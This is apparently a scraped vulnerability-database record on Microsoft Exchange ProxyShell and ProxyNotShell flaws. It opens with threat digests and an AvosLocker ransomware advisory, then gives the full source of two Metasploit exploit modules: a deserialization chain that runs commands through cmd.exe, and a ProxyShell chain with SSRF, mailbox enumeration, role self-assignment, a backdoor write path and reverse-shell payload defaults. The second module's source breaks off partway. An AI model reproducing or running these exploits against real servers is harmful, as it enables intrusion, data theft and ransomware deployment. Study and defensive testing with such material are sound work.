{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. 
Furthermore, threat actors can use the stolen credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and encrypts the victim's documents and files with the \".avos\" extension. The actor then leaves a ransom note in each directory, named \"GET YOUR FILES BACK.txt\", with a link to an AvosLocker .onion payment site.\n\nOrganizations can mitigate the risk by following these recommendations:\n\n\u2022 Keep all operating systems and software up to date. \n\u2022 Remove unnecessary access to administrative shares. \n\u2022 Maintain offline backups of data and ensure all backup data is encrypted and immutable.\n\n**The MITRE TTPs commonly used by AvosLocker are:**\n\nTA0001: Initial Access \nTA0002: Execution \nTA0007: Discovery \nTA0040: Impact \nT1566: Phishing \nT1204: User Execution \nT1082: System Information Discovery \nT1490: Inhibit System Recovery \nT1489: Service Stop \nT1486: Data Encrypted for Impact\n\n#### Actor Detail\n\n#### Vulnerability Details\n\n#### Indicators of Compromise (IoCs)\n\n#### Patches\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n\n#### Recent Breaches\n\n<https://www.unical.com/>\n\n<https://www.paccity.net/>\n\n<https://www.gigabyte.com/>\n\n#### Reference\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-08-11T21:08:01", "description": "This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019. 
These vulnerabilities were patched in November 2022.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T22:00:27", "type": "metasploit", "title": "Microsoft Exchange ProxyNotShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-28T15:06:14", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYNOTSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxynotshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyNotShell RCE',\n 'Description' => %q{\n This module chains two vulnerabilities on Microsoft Exchange 
Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery of ProxyShell SSRF\n 'Spencer McIntyre', # Metasploit module\n 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis\n 'Piotr Bazyd\u0142o', # Vulnerability analysis\n 'Rich Warren', # EEMS bypass via ProxyNotRelay\n 'Soroush Dalili' # EEMS bypass\n ],\n 'References' => [\n [ 'CVE', '2022-41040' ], # ssrf\n [ 'CVE', '2022-41082' ], # rce\n [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],\n [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],\n [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],\n [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]\n ],\n 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyNotShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n 
OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])\n ])\n\n register_advanced_options([\n OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n # actually run the powershell cmdlet and see if it works, this will fail if:\n # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)\n # * the exchange emergency mitigation service M1 rule is in place\n return CheckCode::Safe unless execute_powershell('Get-Mailbox')\n\n CheckCode::Vulnerable\n rescue Msf::Exploit::Failed => e\n CheckCode::Safe(e.to_s)\n end\n\n def ibm037(string)\n string.encode('IBM037').force_encoding('ASCII-8BIT')\n end\n\n def send_http(method, uri, opts = {})\n opts[:authentication] = {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'preferred_auth' => 'NTLM'\n }\n\n if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'\n uri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' 
+ @ssrf_email)}\"\n opts[:headers] = {\n 'X-Up-Devcap-Post-Charset' => 'IBM037',\n # technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362\n 'User-Agent' => \"UP #{datastore['UserAgent']}\"\n }\n else\n uri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\"\n end\n\n super(method, uri, opts)\n end\n\n def exploit\n # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not\n # work on Exchange Server 2016\n if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)\n vprint_status(\"Detected Exchange version: #{version}\")\n if version < Rex::Version.new('15.2')\n fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')\n end\n end\n\n @ssrf_email ||= Faker::Internet.email\n\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n when :windows_dropper\n execute_cmdstager({ linemax: 7_500 })\n end\n end\n\n def execute_command(cmd, _opts = {})\n xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <ResourceDictionary\n xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\n xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\n xmlns:System=\"clr-namespace:System;assembly=mscorlib\"\n xmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n <ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n <ObjectDataProvider.MethodParameters>\n <System:String>cmd.exe</System:String>\n <System:String>/c #{cmd.encode(xml: :text)}</System:String>\n </ObjectDataProvider.MethodParameters>\n </ObjectDataProvider>\n </ResourceDictionary>\n XAML\n\n identity = 
Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <Obj N=\"V\" RefId=\"14\">\n <TN RefId=\"1\">\n <T>System.ServiceProcess.ServiceController</T>\n <T>System.Object</T>\n </TN>\n <ToString>Object</ToString>\n <Props>\n <S N=\"Name\">Type</S>\n <Obj N=\"TargetTypeForDeserialization\">\n <TN RefId=\"1\">\n <T>System.Exception</T>\n <T>System.Object</T>\n </TN>\n <MS>\n <BA N=\"SerializationData\">\n #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}\n </BA>\n </MS>\n </Obj>\n </Props>\n <S>\n <![CDATA[#{xaml}]]>\n </S>\n </Obj>\n IDENTITY\n\n execute_powershell('Get-Mailbox', args: [\n { name: '-Identity', value: identity }\n ])\n end\nend\n\nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream\n include Msf::Util::DotNetDeserialization\n\n def self.generate\n from_values([\n Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),\n Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(\n class_info: Types::General::ClassInfo.new(\n obj_id: 1,\n name: 'System.UnitySerializationHolder',\n member_names: %w[Data UnityType AssemblyName]\n ),\n member_type_info: Types::General::MemberTypeInfo.new(\n binary_type_enums: %i[String Primitive String],\n additional_infos: [ 8 ]\n ),\n member_values: [\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 2,\n string: 'System.Windows.Markup.XamlReader'\n )),\n 4,\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 3,\n string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'\n ))\n ]\n ),\n Types::RecordValues::MessageEnd.new\n ])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxynotshell_rce.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-07T01:57:48", "description": "This module exploits 
a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T14:50:34", "type": "metasploit", "title": "Microsoft Exchange ProxyShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-12-02T20:58:50", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/", "sourceData": "##\n# This module requires Metasploit: 
https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Donny Maasland', # Procedure optimizations (email enumeration)\n 'Rich Warren', # Procedure optimizations (email enumeration)\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 
'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ],\n [ 'URL', 'https://github.com/dmaasland/proxyshell-poc' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [false, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n 
OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(email)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: XMLTemplate.render('soap_autodiscover', email: email),\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was 
found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 
'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def get_sid_for_email(email)\n autodiscover = request_autodiscover(email)\n request_mapi(autodiscover[:legacy_dn])\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def exploit_setup\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n get_common_access_token\n print_good('Successfully assigned the \\'Mailbox Import Export\\' role')\n print_good(\"Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})\")\n end\n\n def probe_powershell_backend(common_access_token)\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{common_access_token}\")\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n end\n\n # this function doesn't return unless it's successful\n def get_common_access_token\n # get a SID from the specified email address\n email_address = datastore['EMAIL']\n unless email_address.blank?\n sid = get_sid_for_email(email_address)\n vprint_status(\"SID: #{sid} (#{email_address})\")\n common_access_token = build_token(sid)\n probe_powershell_backend(common_access_token)\n\n print_status(\"Assigning the 'Mailbox Import Export' role via #{email_address}\")\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: email_address }\n 
])\n unless role_assigned\n fail_with(Failure::BadConfig, 'The specified email address does not have the \\'Mailbox Import Export\\' role and can not self-assign it')\n end\n\n @mailbox_user_sid = sid\n @mailbox_user_email = email_address\n @common_access_token = common_access_token\n return\n end\n\n print_status('Enumerating valid email addresses and searching for one that either has the \\'Mailbox Import Export\\' role or can self-assign it')\n get_emails.each do |this_email_address|\n next if this_email_address == email_address # already tried this one\n\n vprint_status(\"Reattempting to assign the 'Mailbox Import Export' role via #{this_email_address}\")\n begin\n this_sid = get_sid_for_email(this_email_address)\n rescue RuntimeError\n print_error(\"Failed to identify the SID for #{this_email_address}\")\n next\n end\n\n common_access_token = build_token(this_sid)\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: this_email_address }\n ])\n next unless role_assigned\n\n @mailbox_user_sid = this_sid\n @mailbox_user_email = this_email_address\n @common_access_token = common_access_token\n return # rubocop:disable Lint/NonLocalExitFromIterator\n end\n\n fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = \"Email=#{ssrf}\"\n super(method, \"/#{ssrf}#{uri}\", opts)\n end\n\n def get_emails\n mailbox_table = Rex::Text::Table.new(\n 'Header' => 'Exchange Mailboxes',\n 'Columns' => %w[EmailAddress Name RoutingType MailboxType]\n )\n\n MailboxEnumerator.new(self).each do |row|\n mailbox_table << row\n end\n\n print_status(\"Enumerated #{mailbox_table.rows.length} email addresses\")\n stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)\n 
